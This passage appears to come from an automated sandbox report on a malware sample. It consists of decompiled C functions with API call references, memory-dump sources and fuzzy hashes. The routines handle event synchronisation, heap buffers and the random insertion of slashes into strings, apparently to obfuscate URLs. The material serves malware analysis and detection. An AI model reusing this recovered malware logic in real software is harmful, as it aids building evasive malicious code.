                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                					_t66 = E02226725(_t101, 0x222a1d0);
                					_t103 = _t101 - _t79;
                					_a8 = _t103;
                					if(_t103 < 0) {
                						L17:
                						E02226725(_a16, _a4);
                						E02227894(_t79,  &_v428, _a4, _t97);
                						memset( &_v428, 0, 0x10c);
                						_t55 = memset( &_v156, 0, 0x84);
                						goto L18;
                					}
                					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                					do {
                						if(_v8 != 0xffffffff) {
                							_push(1);
                							_push(0);
                							_push(0);
                							_push( *_t99);
                							L022282DA();
                							_t74 = _t66 +  *(_t99 - 4);
                							asm("adc edx, esi");
                							_push(0);
                							_push(_v8 + 1);
                							_push(_t92);
                							_push(_t74);
                							L022282D4();
                							if(_t92 > 0 || _t74 > 0xffffffff) {
                								_t74 = _t74 | 0xffffffff;
                								_v16 = _v16 & 0x00000000;
                							}
                						} else {
                							_t74 =  *_t99;
                						}
                						_t106 = _t107 + _a8 * 4 - 0x1a8;
                						_a12 = _t74;
                						_t76 = E02225F09(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                						while(1) {
                							 *_t99 =  *_t99 - _t76;
                							if( *_t99 != 0) {
                								goto L14;
                							}
                							L13:
                							_t92 =  &_v156;
                							if(E02226E71(_t79, _t92, _t106) < 0) {
                								break;
                							}
                							L14:
                							_a12 = _a12 + 1;
                							_t76 = E022210A0(_t79,  &_v156, _t106, _t106);
                							 *_t99 =  *_t99 - _t76;
                							if( *_t99 != 0) {
                								goto L14;
                							}
                							goto L13;
                						}
                						_a8 = _a8 - 1;
                						_t66 = _a12;
                						_t99 = _t99 - 4;
                						 *(0x222a1d0 + _a8 * 4) = _t66;
                					} while (_a8 >= 0);
                					_t97 = _v12;
                					goto L17;
                				}
                				while(_t81 < _t96) {
                					_t81 = _t81 + 1;
                					_t56 = _t56 >> 1;
                					if(_t56 != 0) {
                						continue;
                					}
                					goto L4;
                				}
                				goto L4;
                			}


                APIs
                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 02224834
                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 0222484A
                • memset.NTDLL ref: 022248F3
                • memset.NTDLL ref: 02224909
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: memset$_allmul_aulldiv
                • String ID:
                • API String ID: 3041852380-0
                • Opcode ID: f8500cef9ff2bc0171a30ee90bdda005f40ed21fde4d5e9122e98b398c3df4c2
                • Instruction ID: 3bc5173a889caf887c276d31a3fe6dbc82491aaef8d7c31a6bf55f3e0e3ad6ba
                • Opcode Fuzzy Hash: f8500cef9ff2bc0171a30ee90bdda005f40ed21fde4d5e9122e98b398c3df4c2
                • Instruction Fuzzy Hash: B441D531A20269BBDB10AFE8DC40BEE7776EF45310F004569F919A7284EB71AE58CF51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 39%
                			E0222454F(void* __eax, void* __ecx) {
                				char _v8;
                				void* _v12;
                				intOrPtr _v16;
                				char _v20;
                				void* __esi;
                				intOrPtr _t36;
                				intOrPtr* _t37;
                				intOrPtr* _t39;
                				void* _t53;
                				long _t58;
                				void* _t59;
                
                				_t53 = __ecx;
                				_t59 = __eax;
                				_t58 = 0;
                				ResetEvent( *(__eax + 0x1c));
                				_push( &_v8);
                				_push(4);
                				_push( &_v20);
                				_push( *((intOrPtr*)(_t59 + 0x18)));
                				if( *0x222a160() != 0) {
                					L5:
                					if(_v8 == 0) {
                						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                						L21:
                						return _t58;
                					}
                					 *0x222a174(0, 1,  &_v12);
                					if(0 != 0) {
                						_t58 = 8;
                						goto L21;
                					}
                					_t36 = E022233DC(0x1000);
                					_v16 = _t36;
                					if(_t36 == 0) {
                						_t58 = 8;
                						L18:
                						_t37 = _v12;
                						 *((intOrPtr*)( *_t37 + 8))(_t37);
                						goto L21;
                					}
                					_push(0);
                					_push(_v8);
                					_push( &_v20);
                					while(1) {
                						_t39 = _v12;
                						_t56 =  *_t39;
                						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                						ResetEvent( *(_t59 + 0x1c));
                						_push( &_v8);
                						_push(0x1000);
                						_push(_v16);
                						_push( *((intOrPtr*)(_t59 + 0x18)));
                						if( *0x222a160() != 0) {
                							goto L13;
                						}
                						_t58 = GetLastError();
                						if(_t58 != 0x3e5) {
                							L15:
                							E022261DA(_v16);
                							if(_t58 == 0) {
                								_t58 = E02222B18(_v12, _t59);
                							}
                							goto L18;
                						}
                						_t58 = E022216B2( *(_t59 + 0x1c), _t56, 0xffffffff);
                						if(_t58 != 0) {
                							goto L15;
                						}
                						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                						if(_t58 != 0) {
                							goto L15;
                						}
                						L13:
                						_t58 = 0;
                						if(_v8 == 0) {
                							goto L15;
                						}
                						_push(0);
                						_push(_v8);
                						_push(_v16);
                					}
                				}
                				_t58 = GetLastError();
                				if(_t58 != 0x3e5) {
                					L4:
                					if(_t58 != 0) {
                						goto L21;
                					}
                					goto L5;
                				}
                				_t58 = E022216B2( *(_t59 + 0x1c), _t53, 0xffffffff);
                				if(_t58 != 0) {
                					goto L21;
                				}
                				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                				goto L4;
                			}


                APIs
                • ResetEvent.KERNEL32(?), ref: 02224565
                • GetLastError.KERNEL32 ref: 0222457E
                  • Part of subcall function 022216B2: WaitForMultipleObjects.KERNEL32(00000002,02227C47,00000000,02227C47,?,?,?,02227C47,0000EA60), ref: 022216CD
                • ResetEvent.KERNEL32(?), ref: 022245F7
                • GetLastError.KERNEL32 ref: 02224612
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: ErrorEventLastReset$MultipleObjectsWait
                • String ID:
                • API String ID: 2394032930-0
                • Opcode ID: 80747420d4f67b86e5960c84d2e4e5ec48d84c9cca0abb35f5939728d033015a
                • Instruction ID: 57710eb3b298bf70c41bff449b0115cacaa87645bd541130531b93c0d3a5e6b3
                • Opcode Fuzzy Hash: 80747420d4f67b86e5960c84d2e4e5ec48d84c9cca0abb35f5939728d033015a
                • Instruction Fuzzy Hash: 2431F332A50225BBCB21AFE4DC44FBE77B9FF84360F110528E551A7194EB72E949CB10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E022249D0(signed int _a4, signed int* _a8) {
                				void* __ecx;
                				void* __edi;
                				signed int _t6;
                				intOrPtr _t8;
                				intOrPtr _t12;
                				short* _t19;
                				void* _t25;
                				signed int* _t28;
                				CHAR* _t30;
                				long _t31;
                				intOrPtr* _t32;
                
                				_t6 =  *0x222a310; // 0xd448b889
                				_t32 = _a4;
                				_a4 = _t6 ^ 0x109a6410;
                				_t8 =  *0x222a348; // 0x9ad5a8
                				_t3 = _t8 + 0x222b7b4; // 0x61636f4c
                				_t25 = 0;
                				_t30 = E022274EC(_t3, 1);
                				if(_t30 != 0) {
                					_t25 = CreateEventA(0x222a34c, 1, 0, _t30);
                					E022261DA(_t30);
                				}
                				_t12 =  *0x222a2fc; // 0x2000000a
                				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E022230D5() != 0) {
                					L12:
                					_t28 = _a8;
                					if(_t28 != 0) {
                						 *_t28 =  *_t28 | 0x00000001;
                					}
                					_t31 = E022237DF(_t32, 0);
                					if(_t31 == 0 && _t25 != 0) {
                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                					}
                					if(_t28 != 0 && _t31 != 0) {
                						 *_t28 =  *_t28 & 0xfffffffe;
                					}
                					goto L20;
                				} else {
                					_t19 =  *0x222a124( *_t32, 0x20);
                					if(_t19 != 0) {
                						 *_t19 = 0;
                						_t19 = _t19 + 2;
                					}
                					_t31 = E022223C4(0,  *_t32, _t19, 0);
                					if(_t31 == 0) {
                						if(_t25 == 0) {
                							L22:
                							return _t31;
                						}
                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                						if(_t31 == 0) {
                							L20:
                							if(_t25 != 0) {
                								CloseHandle(_t25);
                							}
                							goto L22;
                						}
                					}
                					goto L12;
                				}
                			}

                0x022249d1
                0x022249d8
                0x022249e2
                0x022249e6
                0x022249ec
                0x022249fb
                0x02224a02
                0x02224a06
                0x02224a18
                0x02224a1a
                0x02224a1a
                0x02224a1f
                0x02224a26
                0x02224a7d
                0x02224a7d
                0x02224a83
                0x02224a85
                0x02224a85
                0x02224a8f
                0x02224a93
                0x02224aa5
                0x02224aa5
                0x02224aa9
                0x02224aaf
                0x02224aaf
                0x00000000
                0x02224a3f
                0x02224a44
                0x02224a4c
                0x02224a50
                0x02224a54
                0x02224a54
                0x02224a61
                0x02224a65
                0x02224a69
                0x02224abe
                0x02224ac4
                0x02224ac4
                0x02224a77
                0x02224a7b
                0x02224ab2
                0x02224ab4
                0x02224ab7
                0x02224ab7
                0x00000000
                0x02224ab4
                0x02224a7b
                0x00000000
                0x02224a65

                APIs
                  • Part of subcall function 022274EC: lstrlen.KERNEL32(00000005,00000000,43175AC3,00000027,00000000,02BD9E18,00000000,?,?,43175AC3,00000005,0222A00C,4D283A53,?,?), ref: 02227522
                  • Part of subcall function 022274EC: lstrcpy.KERNEL32(00000000,00000000), ref: 02227546
                  • Part of subcall function 022274EC: lstrcat.KERNEL32(00000000,00000000), ref: 0222754E
                • CreateEventA.KERNEL32(0222A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,02226A95,?,?,?), ref: 02224A11
                  • Part of subcall function 022261DA: RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                • WaitForSingleObject.KERNEL32(00000000,00004E20,02226A95,00000000,00000000,?,00000000,?,02226A95,?,?,?), ref: 02224A71
                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,02226A95,?,?,?), ref: 02224A9F
                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,02226A95,?,?,?), ref: 02224AB7
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                • String ID:
                • API String ID: 73268831-0
                • Opcode ID: 90c62d77183cc1ad4400917f9aca90e855c1b669ca9dc3a7be1c59fcd9f6d505
                • Instruction ID: 5c05800794f3043bd555f248af8fd1f02cc88acbda78b187ea13a9f2522bba3f
                • Opcode Fuzzy Hash: 90c62d77183cc1ad4400917f9aca90e855c1b669ca9dc3a7be1c59fcd9f6d505
                • Instruction Fuzzy Hash: 782109329603327BC731AAE49C68AAF73E9EB44718F161615FD41DB148DB2BC84CDB58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 39%
                			E022269E6(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                				intOrPtr _v12;
                				void* _v16;
                				void* _v28;
                				char _v32;
                				void* __esi;
                				void* _t29;
                				void* _t38;
                				signed int* _t39;
                				void* _t40;
                
                				_t36 = __ecx;
                				_v32 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_v12 = _a4;
                				_t38 = E02222A3D(__ecx,  &_v32);
                				if(_t38 != 0) {
                					L12:
                					_t39 = _a8;
                					L13:
                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                						_t23 =  &(_t39[1]);
                						if(_t39[1] != 0) {
                							E022228B3(_t23);
                						}
                					}
                					return _t38;
                				}
                				if(E02226ADC(0x40,  &_v16) != 0) {
                					_v16 = 0;
                				}
                				_t40 = CreateEventA(0x222a34c, 1, 0,  *0x222a3e4);
                				if(_t40 != 0) {
                					SetEvent(_t40);
                					Sleep(0xbb8);
                					CloseHandle(_t40);
                				}
                				_push( &_v32);
                				if(_a12 == 0) {
                					_t29 = E02225704(_t36);
                				} else {
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_t29 = E02224C94(_t36);
                				}
                				_t41 = _v16;
                				_t38 = _t29;
                				if(_v16 != 0) {
                					E02227220(_t41);
                				}
                				if(_t38 != 0) {
                					goto L12;
                				} else {
                					_t39 = _a8;
                					_t38 = E022249D0( &_v32, _t39);
                					goto L13;
                				}
                			}

                0x022269e6
                0x022269f3
                0x022269f9
                0x022269fa
                0x022269fb
                0x022269fc
                0x022269fd
                0x02226a01
                0x02226a0d
                0x02226a11
                0x02226a99
                0x02226a99
                0x02226a9c
                0x02226a9e
                0x02226aa6
                0x02226aac
                0x02226aaf
                0x02226aaf
                0x02226aac
                0x02226aba
                0x02226aba
                0x02226a24
                0x02226a26
                0x02226a26
                0x02226a3d
                0x02226a41
                0x02226a44
                0x02226a4f
                0x02226a56
                0x02226a56
                0x02226a5f
                0x02226a63
                0x02226a71
                0x02226a65
                0x02226a65
                0x02226a66
                0x02226a67
                0x02226a68
                0x02226a69
                0x02226a6a
                0x02226a6a
                0x02226a76
                0x02226a79
                0x02226a7d
                0x02226a7f
                0x02226a7f
                0x02226a86
                0x00000000
                0x02226a88
                0x02226a88
                0x02226a95
                0x00000000
                0x02226a95

                APIs
                • CreateEventA.KERNEL32(0222A34C,00000001,00000000,00000040,?,?,74D0F710,00000000,74D0F730), ref: 02226A37
                • SetEvent.KERNEL32(00000000), ref: 02226A44
                • Sleep.KERNEL32(00000BB8), ref: 02226A4F
                • CloseHandle.KERNEL32(00000000), ref: 02226A56
                  • Part of subcall function 02225704: WaitForSingleObject.KERNEL32(00000000,?,?,?,02226A76,?,02226A76,?,?,?,?,?,02226A76,?), ref: 022257DE
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                • String ID:
                • API String ID: 2559942907-0
                • Opcode ID: bf879626898b12d1a19f2f4192c0a0ea696fbd52eb3cd491be1a89ccb01a6ffc
                • Instruction ID: 2bbc6a98b55f30bbfce23ad9fd192ab74dd6710a061829a49dc5032d9748ef52
                • Opcode Fuzzy Hash: bf879626898b12d1a19f2f4192c0a0ea696fbd52eb3cd491be1a89ccb01a6ffc
                • Instruction Fuzzy Hash: 92215373D1023AFBDB20AFE494849FE77ADAB04314B158425EA11A7108D77B998D8BA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E02224461(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                				intOrPtr _v8;
                				void* _v12;
                				void* _v16;
                				intOrPtr _t26;
                				intOrPtr* _t28;
                				intOrPtr _t31;
                				intOrPtr* _t32;
                				void* _t39;
                				int _t46;
                				intOrPtr* _t47;
                				int _t48;
                
                				_t47 = __eax;
                				_push( &_v12);
                				_push(__eax);
                				_t39 = 0;
                				_t46 = 0;
                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                				_v8 = _t26;
                				if(_t26 < 0) {
                					L13:
                					return _v8;
                				}
                				if(_v12 == 0) {
                					Sleep(0xc8);
                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                				}
                				if(_v8 >= _t39) {
                					_t28 = _v12;
                					if(_t28 != 0) {
                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                						_v8 = _t31;
                						if(_t31 >= 0) {
                							_t46 = lstrlenW(_v16);
                							if(_t46 != 0) {
                								_t46 = _t46 + 1;
                								_t48 = _t46 + _t46;
                								_t39 = E022233DC(_t48);
                								if(_t39 == 0) {
                									_v8 = 0x8007000e;
                								} else {
                									memcpy(_t39, _v16, _t48);
                								}
                								__imp__#6(_v16);
                							}
                						}
                						_t32 = _v12;
                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                					}
                					 *_a4 = _t39;
                					 *_a8 = _t46 + _t46;
                				}
                				goto L13;
                			}

                0x0222446d
                0x02224471
                0x02224472
                0x02224473
                0x02224475
                0x02224477
                0x0222447a
                0x0222447f
                0x02224516
                0x0222451d
                0x0222451d
                0x02224488
                0x0222448f
                0x0222449f
                0x0222449f
                0x022244a5
                0x022244a7
                0x022244ac
                0x022244b5
                0x022244bb
                0x022244c0
                0x022244cb
                0x022244cf
                0x022244d1
                0x022244d2
                0x022244db
                0x022244df
                0x022244f0
                0x022244e1
                0x022244e6
                0x022244eb
                0x022244fa
                0x022244fa
                0x022244cf
                0x02224500
                0x02224506
                0x02224506
                0x0222450f
                0x02224514
                0x02224514
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: FreeSleepStringlstrlenmemcpy
                • String ID:
                • API String ID: 1198164300-0
                • Opcode ID: aad8c79f4a0cfff9bdda8eb387e3b81228e233f8a011d1ecc15b785a153d4c6d
                • Instruction ID: 37fc0b6eee67db4388391601b805e0af7d94b90e60e437a6e44b64756080c940
                • Opcode Fuzzy Hash: aad8c79f4a0cfff9bdda8eb387e3b81228e233f8a011d1ecc15b785a153d4c6d
                • Instruction Fuzzy Hash: 8221607590021AFFCB11EFE4D988D9EBBB9FF48304B208169E94597214EB71EA58CF50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E02222708(unsigned int __eax, void* __ecx) {
                				void* _v8;
                				void* _v12;
                				signed int _t21;
                				signed short _t23;
                				char* _t27;
                				void* _t29;
                				void* _t30;
                				unsigned int _t33;
                				void* _t37;
                				unsigned int _t38;
                				void* _t41;
                				void* _t42;
                				int _t45;
                				void* _t46;
                
                				_t42 = __eax;
                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                				_t38 = __eax;
                				_t30 = RtlAllocateHeap( *0x222a2d8, 0, (__eax >> 3) + __eax + 1);
                				_v12 = _t30;
                				if(_t30 != 0) {
                					_v8 = _t42;
                					do {
                						_t33 = 0x18;
                						if(_t38 <= _t33) {
                							_t33 = _t38;
                						}
                						_t21 =  *0x222a2f0; // 0x23f6d10e
                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                						 *0x222a2f0 = _t23;
                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                						memcpy(_t30, _v8, _t45);
                						_v8 = _v8 + _t45;
                						_t27 = _t30 + _t45;
                						_t38 = _t38 - _t45;
                						_t46 = _t46 + 0xc;
                						 *_t27 = 0x2f;
                						_t13 = _t27 + 1; // 0x1
                						_t30 = _t13;
                					} while (_t38 > 8);
                					memcpy(_t30, _v8, _t38 + 1);
                				}
                				return _v12;
                			}

                0x02222710
                0x02222713
                0x02222719
                0x02222731
                0x02222733
                0x02222738
                0x0222273a
                0x0222273d
                0x0222273f
                0x02222742
                0x02222744
                0x02222744
                0x02222746
                0x02222751
                0x02222756
                0x02222767
                0x0222276f
                0x02222774
                0x02222777
                0x0222277a
                0x0222277c
                0x0222277f
                0x02222782
                0x02222782
                0x02222785
                0x02222790
                0x02222795
                0x0222279f

                APIs
                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02226708,00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 02222713
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0222272B
                • memcpy.NTDLL(00000000,02BD9600,-00000008,?,?,?,02226708,00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 0222276F
                • memcpy.NTDLL(00000001,02BD9600,00000001,02223ECE,00000000,02BD9600), ref: 02222790
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: memcpy$AllocateHeaplstrlen
                • String ID:
                • API String ID: 1819133394-0
                • Opcode ID: 92934c84420b878f45ba229e3917395dcaa7bdbc40a3780c4773d58b959d1819
                • Instruction ID: ff832da89e81e1ded178ffe2ad55fe84fa39cc66568238eaf7fa20cabd1bbdf9
                • Opcode Fuzzy Hash: 92934c84420b878f45ba229e3917395dcaa7bdbc40a3780c4773d58b959d1819
                • Instruction Fuzzy Hash: E5110A72E00225BFD7248AA9DC88D9E7BAEEB90360B150276F804D7150E7729E188790
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02227843(void* __esi) {
                				struct _SECURITY_ATTRIBUTES* _v4;
                				void* _t8;
                				void* _t10;
                
                				_v4 = 0;
                				memset(__esi, 0, 0x38);
                				_t8 = CreateEventA(0, 1, 0, 0);
                				 *(__esi + 0x1c) = _t8;
                				if(_t8 != 0) {
                					_t10 = CreateEventA(0, 1, 1, 0);
                					 *(__esi + 0x20) = _t10;
                					if(_t10 == 0) {
                						CloseHandle( *(__esi + 0x1c));
                					} else {
                						_v4 = 1;
                					}
                				}
                				return _v4;
                			}

                0x0222784d
                0x02227851
                0x02227866
                0x02227868
                0x0222786d
                0x02227873
                0x02227875
                0x0222787a
                0x02227885
                0x0222787c
                0x0222787c
                0x0222787c
                0x0222787a
                0x02227893

                APIs
                • memset.NTDLL ref: 02227851
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,74CF81D0,00000000,00000000), ref: 02227866
                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02227873
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02223F34,00000000,?), ref: 02227885
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: CreateEvent$CloseHandlememset
                • String ID:
                • API String ID: 2812548120-0
                • Opcode ID: b3edef6b3cf9b1c5fb2b6354881b9da98b732a5b1ddaae5011d5158bd5b21599
                • Instruction ID: 91e70963205a42db1060e26c7f8788dfa5b8035e2a2361b09da3bd96fcd51359
                • Opcode Fuzzy Hash: b3edef6b3cf9b1c5fb2b6354881b9da98b732a5b1ddaae5011d5158bd5b21599
                • Instruction Fuzzy Hash: BBF05EB151431CBFD3206FA6DCC4C2BFBACEB8219CB524E3EF14292111C673A95C8A61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00501C63), ref: 00501FDE
                • GetVersion.KERNEL32(?,00501C63), ref: 00501FED
                • GetCurrentProcessId.KERNEL32(?,00501C63), ref: 00502009
                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00501C63), ref: 00502022
                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID: Process$CreateCurrentEventOpenVersion
                • String ID:
                • API String ID: 845504543-0
                • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                • Instruction ID: 5aef440978b329ac0749ef90c869a383fb288a48ed6004586c619065f822f00d
                • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                • Instruction Fuzzy Hash: 2FF04FB05413019BE7609F78BE1DB593F68B795752F104136E741FA1E4E7708982CB5C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02223230() {
                				void* _t1;
                				intOrPtr _t5;
                				void* _t6;
                				void* _t7;
                				void* _t11;
                
                				_t1 =  *0x222a30c; // 0x1b0
                				if(_t1 == 0) {
                					L8:
                					return 0;
                				}
                				SetEvent(_t1);
                				_t11 = 0x7fffffff;
                				while(1) {
                					SleepEx(0x64, 1);
                					_t5 =  *0x222a35c; // 0x0
                					if(_t5 == 0) {
                						break;
                					}
                					_t11 = _t11 - 0x64;
                					if(_t11 > 0) {
                						continue;
                					}
                					break;
                				}
                				_t6 =  *0x222a30c; // 0x1b0
                				if(_t6 != 0) {
                					CloseHandle(_t6);
                				}
                				_t7 =  *0x222a2d8; // 0x27e0000
                				if(_t7 != 0) {
                					HeapDestroy(_t7);
                				}
                				goto L8;
                			}

                0x02223230
                0x02223237
                0x02223281
                0x02223283
                0x02223283
                0x0222323b
                0x02223241
                0x02223246
                0x0222324a
                0x02223250
                0x02223257
                0x00000000
                0x00000000
                0x02223259
                0x0222325e
                0x00000000
                0x00000000
                0x00000000
                0x0222325e
                0x02223260
                0x02223268
                0x0222326b
                0x0222326b
                0x02223271
                0x02223278
                0x0222327b
                0x0222327b
                0x00000000

                APIs
                • SetEvent.KERNEL32(000001B0,00000001,0222109A), ref: 0222323B
                • SleepEx.KERNEL32(00000064,00000001), ref: 0222324A
                • CloseHandle.KERNEL32(000001B0), ref: 0222326B
                • HeapDestroy.KERNEL32(027E0000), ref: 0222327B
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: CloseDestroyEventHandleHeapSleep
                • String ID:
                • API String ID: 4109453060-0
                • Opcode ID: a07738fc235e2c660d924cfb313964ff377ada2ddb8903a656d294a187341335
                • Instruction ID: d7647ea5fceae90a0797a3837182b3357b5efac5099ecf38804db4fbd9c276ad
                • Opcode Fuzzy Hash: a07738fc235e2c660d924cfb313964ff377ada2ddb8903a656d294a187341335
                • Instruction Fuzzy Hash: 27F08274E50222B7DB309AF5B98CA4237D8AB04760B161A40BC00E6284CB67D85C8960
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E0222607C() {
                				void* _v0;
